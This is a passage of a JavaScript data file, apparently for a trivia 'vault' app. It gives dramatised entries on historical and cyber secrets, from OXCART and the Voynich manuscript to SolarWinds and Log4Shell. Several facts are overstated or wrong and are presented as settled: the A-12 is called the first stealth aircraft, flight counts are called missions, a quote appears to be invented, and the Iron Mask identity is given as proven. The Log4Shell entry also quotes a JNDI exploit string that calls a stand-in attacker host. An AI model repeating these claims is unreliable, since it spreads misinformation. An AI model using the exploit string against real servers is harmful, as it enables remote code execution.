    summary: 'Area 51 was built to test the CIA\'s Mach 3.2 spy plane — the A-12 OXCART. 50 years of UFO sightings were actually classified aircraft flying at impossible speeds.',
    fullStory: 'In 1955, the CIA selected Groom Lake, Nevada (later known as Area 51) to test the U-2 spy plane. By 1957, Lockheed\'s Skunk Works — led by Kelly Johnson and later Ben Rich — was developing the A-12 OXCART: a titanium aircraft that could fly at Mach 3.2 (2,193 mph) at 90,000 feet. At those speeds, the airframe heated to 300°C and expanded several inches in flight. The A-12 was effectively invisible to radar (the first true stealth aircraft) and could outrun any missile fired at it. The CIA flew 2,850 OXCART missions. When airline pilots or civilians reported "UFOs" — bright objects moving at impossible speeds at extreme altitudes — the Air Force filed them as "unexplained" rather than reveal the program. A 1997 CIA study concluded that over half of all UFO reports from the late 1950s through the 1960s were actually U-2 and OXCART flights. The program was fully declassified in 2007, meaning Area 51\'s primary purpose was hidden for 50 years.',
    keyFigures: ['Kelly Johnson', 'Ben Rich', 'Richard Bissell', 'Tony LeVier'],
    significance: 'The most famous "conspiracy theory" location in the world was actually hiding something — just not aliens. The real secret was even more impressive: aircraft that could outrun missiles.',
    legacy: 'The SR-71 Blackbird (OXCART\'s successor) still holds the speed record for manned aircraft. Its stealth technology directly led to the F-117, B-2, and F-22.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 9,
    impact: 8,
  },
  {
    id: 'floppy-nukes',
    rank: 21,
    name: 'US Nuclear Arsenal Ran on 8-inch Floppy Disks Until 2019',
    codename: 'SACDIN',
    classifiedYear: 'Technically not classified — just embarrassing',
    declassifiedYear: '2014 (GAO report)',
    agency: 'US Strategic Command',
    field: 'Legacy Systems & Nuclear C2',
    domain: 'Engineering',
    domainEmoji: '💾',
    summary: 'The system controlling America\'s nuclear missiles, bombers, and submarines used 8-inch floppy disks and a 1970s IBM Series/1 computer until a 2019 upgrade. Intentionally.',
    fullStory: 'In 2014, a Government Accountability Office (GAO) report revealed that the Strategic Automated Command and Control System (SACCS) — which coordinates the operational functions of US nuclear forces — ran on an IBM Series/1 computer from the 1970s using 8-inch floppy disks. The internet collectively gasped. But here\'s the twist: the Pentagon argued this was actually a security feature, not a bug. The system was air-gapped (no network connection), used no common operating system (making it immune to malware), and the floppy disk format was so obsolete that no attacker would have the hardware to create a weaponized disk. As one Air Force officer put it: "It\'s the most cybersecure system in the world because nobody knows how to hack it anymore." The DoD finally upgraded SACDIN to solid-state digital storage in 2019 — not because the old system was broken, but because finding replacement parts for 1970s IBM hardware was becoming impossible.',
    keyFigures: ['GAO Investigators', 'Lt. Col. Jason Rossi', 'IBM Series/1 Engineers'],
    significance: 'The most powerful weapons on Earth were controlled by technology older than the internet. And it might have been the smartest security decision ever made.',
    legacy: '"Security through obsolescence" became a legitimate concept in cybersecurity discourse. Sometimes the safest computer is the one nobody remembers how to use.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 3,
    impact: 7,
  },
  {
    id: 'pigeon-cipher',
    rank: 22,
    name: 'WWII Pigeon Cipher — Found in a Chimney in 2012',
    codename: '27 DOVET / AOAKN',
    classifiedYear: '1944',
    declassifiedYear: 'Still undecoded',
    agency: 'British SOE / MI6',
    field: 'Wartime One-Time Pad',
    domain: 'Cryptography',
    domainEmoji: '🐦',
    summary: 'In 2012, a homeowner found a dead carrier pigeon in his chimney with a coded WWII message attached to its leg. GCHQ tried to crack it and failed. It remains unbroken.',
    fullStory: 'In 2012, David Martin of Surrey, England discovered the skeleton of a carrier pigeon behind his fireplace during renovations. Attached to its leg bone was a red capsule containing a coded message on thin paper, addressed to "X02" from "Sjt W Stot" and consisting of 27 five-letter code groups. GCHQ — the UK\'s signals intelligence agency, direct descendant of Bletchley Park — was contacted and spent considerable effort trying to decode it. They concluded it was likely encrypted with a one-time pad (making it theoretically unbreakable without the specific key page used), or possibly using a codebook that no longer exists. The message was likely sent during D-Day operations in 1944. Despite global media attention and thousands of amateur codebreaker attempts, the message remains undecoded. One Canadian historian claimed to have cracked it using a WWI-era codebook, producing the plaintext "Jerry artillery positions at..." but GCHQ dismissed his solution as coincidental.',
    keyFigures: ['David Martin', 'Sjt W Stot (unknown)', 'GCHQ analysts'],
    significance: 'A 70-year-old pigeon defeated the combined efforts of GCHQ and the global internet. Sometimes the best encryption is a dead bird in a chimney.',
    legacy: 'The pigeon is now on display at Bletchley Park museum. The message will likely never be decoded — the one-time pad key died with its sender.',
    relatedTopic: 'cryptography',
    secrecyLevel: 7,
    impact: 3,
  },
  {
    id: 'cicada3301',
    rank: 23,
    name: 'Cicada 3301 — The Internet\'s Most Mysterious Puzzle',
    codename: 'Cicada 3301',
    classifiedYear: '2012',
    declassifiedYear: 'Unknown — puzzle creators never revealed',
    agency: 'Unknown (speculated: NSA, CIA, MI6, or private group)',
    field: 'Cryptographic Recruitment Puzzles',
    domain: 'Cryptography',
    domainEmoji: '🦗',
    summary: 'In 2012, an anonymous entity posted a cryptographic puzzle on 4chan requiring skills in steganography, number theory, and physical geocaching. Winners were recruited. For what? Nobody knows.',
    fullStory: 'On January 4, 2012, an anonymous post appeared on 4chan: "Hello. We are looking for highly intelligent individuals. To find them, we have devised a test. There is a message hidden in this image. Find it, and it will lead you on the road to finding us. We look forward to meeting the few that will make it all the way through. Good luck. 3301." The image contained steganographic data leading to a chain of increasingly difficult puzzles spanning PGP encryption, Mayan numerology, cyberpunk literature references, Welsh telephone numbers, QR codes posted on physical lampposts in 14 countries simultaneously, Tor hidden services, and runic manuscripts referencing Agrippa. The puzzles ran annually from 2012 to 2014, then stopped. Solvers who reached the end reportedly received encrypted emails inviting them to a private network. The organization\'s identity has never been confirmed. Theories range from NSA/GCHQ recruitment to a privacy-focused tech collective. The cryptographic sophistication suggests well-funded professionals.',
    keyFigures: ['Unknown — "3301"', 'Marcus Wanner (solver)', 'Joel Eriksson (solver)'],
    significance: 'The most elaborate and mysterious public cryptographic puzzle ever created. The fact that its creators remain anonymous after 12+ years is itself a testament to their operational security.',
    legacy: 'Inspired countless imitators and "ARG" (alternate reality game) culture. The few confirmed solvers have never fully disclosed what they found, maintaining the mystery.',
    relatedTopic: 'cryptography',
    secrecyLevel: 8,
    impact: 5,
  },
  {
    id: 'y2k-missiles',
    rank: 24,
    name: 'Y2K Nuclear False Alarm Preparation',
    codename: 'Center for Y2K Strategic Stability',
    classifiedYear: '1998',
    declassifiedYear: '2000',
    agency: 'US DoD / Russian Strategic Rocket Forces',
    field: 'Nuclear Command & Control',
    domain: 'Engineering',
    domainEmoji: '☢️',
    summary: 'The US and Russia were so worried that Y2K bugs could trigger accidental nuclear launches that they established a joint command center in Colorado — Cold War enemies watching the millennium together.',
    fullStory: 'In the late 1990s, the Y2K bug posed a terrifying question for nuclear strategists: what happens if early warning radar systems, satellite feeds, or launch computers interpret the date rollover from 1999 to 2000 as a system failure — or worse, as an incoming attack? Both the US and Russia operated nuclear forces on hair-trigger alert, with launch-on-warning doctrines requiring response within 15-30 minutes. A false alarm caused by a software bug could trigger a nuclear exchange before humans realized the error. The solution was unprecedented: the US and Russia established the Center for Y2K Strategic Stability inside Cheyenne Mountain, Colorado — the hardest military target on Earth. Russian military officers sat alongside American officers to monitor both countries\' nuclear forces during the midnight rollover across every time zone. For one night, the two nations that had spent 50 years preparing to destroy each other cooperated to make sure a two-digit date field didn\'t end civilization.',
    keyFigures: ['Gen. Eugene Habiger', 'Col. Gen. Vladimir Yakovlev', 'John Koskinen'],
    significance: 'The only time in history that American and Russian nuclear command staff sat in the same room watching each other\'s launch systems. A software bug brought enemies closer than diplomacy ever did.',
    legacy: 'The center was decommissioned on January 2, 2000. It remains the most wholesome nuclear weapons story ever told.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 5,
    impact: 7,
  },
  // ── 4 More Older Classified Secrets ──────────────────────────
  {
    id: 'black-chamber',
    rank: 25,
    name: 'The American Black Chamber',
    codename: 'MI-8 / The Black Chamber',
    classifiedYear: '1919',
    declassifiedYear: '1931 (exposed by Yardley)',
    agency: 'US State Department / War Department',
    field: 'Diplomatic Codebreaking',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'America\'s first peacetime codebreaking agency cracked Japanese diplomatic codes during the 1921 Naval Conference — then its founder published all the secrets for money.',
    fullStory: 'After WWI, cryptanalyst Herbert O. Yardley convinced the State and War Departments to fund a secret peacetime codebreaking bureau — the "American Black Chamber" (officially MI-8). Operating from a brownstone in New York City disguised as a commercial code company, Yardley\'s team broke the diplomatic codes of over 20 nations, including Japan. During the 1921-22 Washington Naval Conference, the Black Chamber read Japan\'s internal communications revealing their minimum acceptable battleship ratio, allowing US negotiators to push Japan to accept worse terms. Secretary of State Henry Stimson shut the Chamber in 1929, famously declaring "Gentlemen do not read each other\'s mail." Yardley, now unemployed, wrote "The American Black Chamber" in 1931, exposing the entire operation — including the Japanese codebreaking. Japan immediately changed all their codes. The book was a bestseller but caused a diplomatic catastrophe. Congress passed a law making it a crime to publish decoded foreign communications.',
    keyFigures: ['Herbert O. Yardley', 'Henry Stimson', 'William Friedman'],
    significance: 'The first major intelligence whistleblower in US history — except Yardley did it for the book royalties, not for principles.',
    legacy: 'Japan\'s code overhaul after Yardley\'s book led directly to the development of the Purple cipher — which the US then had to break all over again. Yardley\'s betrayal made the next war harder.',
    relatedTopic: 'cryptography',
    secrecyLevel: 7,
    impact: 8,
  },
  {
    id: 'babington-plot',
    rank: 26,
    name: 'The Babington Plot Cipher — History\'s Most Fatal Decrypt',
    codename: 'None',
    classifiedYear: '1586',
    declassifiedYear: '1586 (used as evidence)',
    agency: 'Sir Francis Walsingham\'s Secret Service',
    field: 'Nomenclator Cryptanalysis',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'Queen Elizabeth\'s spymaster cracked Mary Queen of Scots\' cipher, forged a postscript to entrap her co-conspirators, and used the decrypted letters to send her to the executioner\'s block.',
    fullStory: 'In 1586, Mary Queen of Scots was imprisoned by her cousin Elizabeth I. Catholic conspirator Anthony Babington organized a plot to assassinate Elizabeth and install Mary on the throne. Messages were smuggled in and out of Mary\'s prison in beer barrel corks by a double agent working for spymaster Sir Francis Walsingham. Mary used a nomenclator cipher — a combination of substitution alphabet and code symbols for common words. Walsingham\'s cryptanalyst Thomas Phelippes broke the cipher and read every letter. When Mary wrote approving the assassination plot, Phelippes didn\'t just decrypt it — he forged a postscript asking Babington to name his co-conspirators. Babington replied with the names. All were arrested and executed. The decrypted letters were presented at Mary\'s trial as evidence. She was beheaded on February 8, 1587. This is the first documented case of cryptanalysis directly causing an execution.',
    keyFigures: ['Thomas Phelippes', 'Sir Francis Walsingham', 'Mary Queen of Scots', 'Anthony Babington'],
    significance: 'The first known use of active cryptanalysis as a weapon — not just reading the enemy\'s mail, but forging additions to entrap them.',
    legacy: 'Established signals intelligence as a tool of statecraft. Walsingham\'s playbook — intercept, decrypt, exploit, forge — is still the template for intelligence operations 440 years later.',
    relatedTopic: 'cryptography',
    secrecyLevel: 6,
    impact: 9,
  },
  {
    id: 'great-cipher',
    rank: 27,
    name: 'The Great Cipher of Louis XIV',
    codename: 'Le Grand Chiffre',
    classifiedYear: '1690s',
    declassifiedYear: '1893 (finally broken)',
    agency: 'French Crown',
    field: 'Homophonic Cipher',
    domain: 'Cryptography',
    domainEmoji: '🔐',
    summary: 'The Rossignol family created a cipher so strong it kept the secrets of the Sun King for 200 years — including the true identity of the Man in the Iron Mask.',
    fullStory: 'Antoine and Bonaventure Rossignol, father and son, served as cryptanalysts to Louis XIV and developed the "Grand Chiffre" — a homophonic substitution cipher using 587 numbers to represent syllables, words, and null symbols. Unlike simple substitution ciphers, the use of syllables instead of letters made frequency analysis nearly impossible. When the Rossignols died, the key died with them. For 200 years, French archives contained thousands of pages of undecipherable royal correspondence. In 1893, military cryptanalyst Étienne Bazeries finally cracked it after three years of painstaking work. Among the decrypted documents was a letter revealing that the Man in the Iron Mask was not a twin brother of Louis XIV (as Dumas wrote) but General Vivien de Bulonde, imprisoned for cowardice at the Battle of Cuneo in 1691. Two centuries of literary speculation dissolved in a single decryption.',
    keyFigures: ['Antoine Rossignol', 'Bonaventure Rossignol', 'Étienne Bazeries', 'Louis XIV'],
    significance: 'The cipher that kept a king\'s secrets for two centuries — and when finally broken, it debunked one of history\'s greatest mysteries.',
    legacy: 'The Grand Chiffre proved that syllable-based ciphers resist frequency analysis far better than letter-based ones. Bazeries\' breakthrough technique influenced all subsequent historical cryptanalysis.',
    relatedTopic: 'cryptography',
    secrecyLevel: 8,
    impact: 7,
  },
  {
    id: 'voynich',
    rank: 28,
    name: 'The Voynich Manuscript — 600 Years Unsolved',
    codename: 'MS 408',
    classifiedYear: '~1404-1438 (estimated)',
    declassifiedYear: 'Still undeciphered',
    agency: 'Unknown author',
    field: 'Unknown Cipher or Language',
    domain: 'Cryptography',
    domainEmoji: '📜',
    summary: 'A 240-page illustrated manuscript written in an unknown script that has defeated every codebreaker, linguist, and AI system for over 600 years. Nobody knows if it\'s a cipher, a lost language, or an elaborate hoax.',
    fullStory: 'The Voynich manuscript is a 240-page vellum codex written in an unknown writing system, illustrated with bizarre botanical drawings of plants that don\'t exist, astronomical diagrams, and naked figures in green pools. Carbon-dated to 1404-1438, it was purchased by book dealer Wilfrid Voynich in 1912. Since then, it has been studied by the world\'s best cryptanalysts — including William Friedman (who cracked Purple) and Elizebeth Friedman — and none have produced a accepted decipherment. Statistical analysis shows the text has structure consistent with natural language (Zipf\'s law, entropy patterns), but no proposed alphabet mapping has produced readable text. The manuscript is now at Yale\'s Beinecke Library. Theories range from an unknown natural language to a constructed language, a sophisticated hoax by Voynich himself, or an elaborate form of glossolalia. AI systems have been applied since the 2010s with no definitive results.',
    keyFigures: ['Wilfrid Voynich', 'William Friedman', 'Elizebeth Friedman', 'Prescott Currier'],
    significance: 'The ultimate humbling artifact — proof that human intellect has limits. The greatest codebreakers in history couldn\'t crack a 600-year-old book.',
    legacy: 'The Voynich manuscript inspired the field of computational historical linguistics and remains the single most studied undeciphered text in the world.',
    relatedTopic: 'cryptography',
    secrecyLevel: 10,
    impact: 5,
  },
  // ── 4 More Modern Classified Secrets ──────────────────────────
  {
    id: 'solarwinds',
    rank: 29,
    name: 'SolarWinds SUNBURST — The Supply Chain Apocalypse',
    codename: 'SUNBURST / UNC2452',
    classifiedYear: '2019 (attack began)',
    declassifiedYear: '2020 (discovered by FireEye)',
    agency: 'SVR (Russian Foreign Intelligence)',
    field: 'Supply Chain Attack',
    domain: 'Cybersecurity',
    domainEmoji: '🛡️',
    summary: 'Russian intelligence compromised SolarWinds\' build system, injecting a backdoor into software updates sent to 18,000 organizations — including the US Treasury, Pentagon, and nuclear weapons agency.',
    fullStory: 'In early 2020, Russian hackers (attributed to SVR\'s APT29/Cozy Bear) compromised SolarWinds\' Orion IT monitoring software build pipeline. They injected a backdoor called SUNBURST into legitimate software updates that were digitally signed by SolarWinds and distributed to approximately 18,000 customers. The infected update contained a dormant backdoor that waited 12-14 days before activating, then mimicked the Orion protocol to blend with normal traffic. Victims included the US Treasury, Commerce Department, Department of Homeland Security, parts of the Pentagon, the National Nuclear Security Administration, and cybersecurity firm FireEye. FireEye discovered the breach in December 2020 when attackers tried to steal their red team tools. The attackers had been inside government networks for 9+ months. The supply chain vector meant that organizations\' own security tools were the attack surface — the digital equivalent of poisoning the water supply.',
    keyFigures: ['Kevin Mandia (FireEye)', 'Microsoft MSTIC', 'CISA Director Chris Krebs'],
    significance: 'Demonstrated that supply chain attacks can compromise thousands of high-value targets simultaneously by poisoning a single trusted vendor.',
    legacy: 'Led to Executive Order 14028 mandating software supply chain security. Spawned the SBOM (Software Bill of Materials) movement and zero-trust architecture adoption across the US government.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 8,
    impact: 10,
  },
  {
    id: 'pegasus',
    rank: 30,
    name: 'NSO Pegasus — Zero-Click Phone Surveillance',
    codename: 'Pegasus',
    classifiedYear: '~2016',
    declassifiedYear: '2021 (Pegasus Project)',
    agency: 'NSO Group (Israel) / Multiple governments',
    field: 'Mobile Exploitation',
    domain: 'Cybersecurity',
    domainEmoji: '📱',
    summary: 'Israeli firm NSO Group sold zero-click spyware that could silently compromise any iPhone or Android — used by governments to surveil journalists, activists, and heads of state, including Macron.',
    fullStory: 'NSO Group, an Israeli cyber-intelligence firm, developed Pegasus — spyware capable of silently compromising smartphones with zero user interaction (no click required). Using zero-day exploits in iMessage, WhatsApp, and other apps, Pegasus could be deployed by sending an invisible message that the target never saw. Once installed, it had complete access: messages, emails, photos, microphone, camera, GPS, passwords, and encrypted communications from Signal and WhatsApp. In 2021, the Pegasus Project (a collaboration of 80+ journalists from 17 media organizations) analyzed a leaked list of 50,000+ phone numbers selected for potential surveillance. Targets included French President Macron, journalists from Al Jazeera and Le Monde, human rights activists, opposition politicians, and the fiancée of murdered journalist Jamal Khashoggi. NSO claimed it only sold to governments for counter-terrorism. Citizen Lab documented use against dissidents in Saudi Arabia, UAE, Mexico, and India.',
    keyFigures: ['Shalev Hulio (NSO)', 'Citizen Lab', 'Claudio Guarnieri', 'Bill Marczak'],
    significance: 'Proved that no phone is secure against a well-funded adversary. Zero-click exploits mean even security-conscious users have no defense.',
    legacy: 'Apple sued NSO Group. The US blacklisted NSO. The EU investigated member states. Pegasus forced a global reckoning with the mercenary spyware industry.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 8,
    impact: 9,
  },
  {
    id: 'log4shell',
    rank: 31,
    name: 'Log4Shell — The 10/10 Vulnerability',
    codename: 'CVE-2021-44228',
    classifiedYear: '2013 (vulnerability introduced)',
    declassifiedYear: '2021 (disclosed)',
    agency: 'Open Source (Apache Foundation)',
    field: 'Remote Code Execution',
    domain: 'Cybersecurity',
    domainEmoji: '🛡️',
    summary: 'A single line of text in a chat message, username, or search query could take over any server running Java\'s Log4j library — affecting billions of devices from Minecraft to iCloud.',
    fullStory: 'On November 24, 2021, Alibaba Cloud security researcher Chen Zhaojun reported a critical vulnerability in Apache Log4j, a near-universal Java logging library. The bug was absurdly simple: Log4j would interpret special syntax like ${jndi:ldap://attacker.com/exploit} in any logged string as an instruction to fetch and execute remote code. Since virtually everything gets logged — usernames, search queries, HTTP headers, chat messages — an attacker could achieve remote code execution by simply typing the exploit string in a chat box, search field, or even renaming their iPhone. The vulnerability received a perfect CVSS score of 10.0. Log4j was embedded in an estimated 3+ billion devices and applications including Apache, Elasticsearch, Minecraft, Steam, iCloud, Twitter, and virtually every enterprise Java application. Exploitation began within hours of public disclosure. The Minecraft community discovered it first when players crashed servers by typing the exploit in chat.',
    keyFigures: ['Chen Zhaojun', 'Ralph Goers (Log4j maintainer)', 'Minecraft community'],
    significance: 'A volunteer-maintained library used by billions of devices had a trivially exploitable RCE vulnerability hiding in plain sight for 8 years.',
    legacy: 'Catalyzed massive investment in open-source security. The White House held a summit on open-source software security. Google committed $10B to cybersecurity. The Log4j maintainers were volunteers working for free.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 4,
    impact: 10,
  },
  {
    id: 'spectre-meltdown',
    rank: 32,
    name: 'Spectre & Meltdown — Every CPU Is Broken',
    codename: 'Spectre / Meltdown',
    classifiedYear: '2017 (discovered)',
    declassifiedYear: '2018 (disclosed)',
    agency: 'Google Project Zero / TU Graz / Cyberus',
    field: 'Hardware Vulnerability',
    domain: 'Cybersecurity',
    domainEmoji: '🛡️',
    summary: 'Researchers discovered that a performance optimization used in virtually every CPU made since 1995 — speculative execution — allows any program to read any memory on the computer, including passwords and encryption keys.',
    fullStory: 'In January 2018, three teams independently disclosed two classes of hardware vulnerabilities affecting nearly every processor made since 1995. Meltdown (CVE-2017-5754) allowed any user-space program to read kernel memory, breaking the fundamental security boundary of operating systems. Spectre (CVE-2017-5753, CVE-2017-5715) was even worse: it exploited speculative execution — a performance optimization where CPUs predict and pre-execute future instructions — to leak data across any security boundary, including browser sandboxes. The vulnerability existed in the fundamental architecture of how CPUs had been designed for 20+ years. Intel, AMD, and ARM processors were all affected. Software patches reduced performance by 5-30%. A complete fix would require redesigning CPUs from scratch. Google\'s Jann Horn independently discovered both vulnerabilities while Intel was secretly working on patches, forcing early disclosure when hints leaked. The embargo was chaotic — Linux kernel patches revealed the issue before the official announcement.',
    keyFigures: ['Jann Horn (Google)', 'Daniel Gruss (TU Graz)', 'Paul Kocher', 'Moritz Lipp'],
    significance: 'Proved that the security boundary between programs on the same computer was an illusion. Every CPU sold for two decades had a fundamental design flaw.',
    legacy: 'Spawned a new field of transient execution attacks. CPU manufacturers now design for security, not just speed. The "fast but insecure" era of processor design ended.',
    relatedTopic: 'cybersecurity',
    secrecyLevel: 6,
    impact: 10,
  },
];

export const VAULT_AGENCIES = [...new Set(VAULT_ENTRIES.map((e) => e.agency))];
export const VAULT_DOMAINS = [...new Set(VAULT_ENTRIES.map((e) => e.domain))];
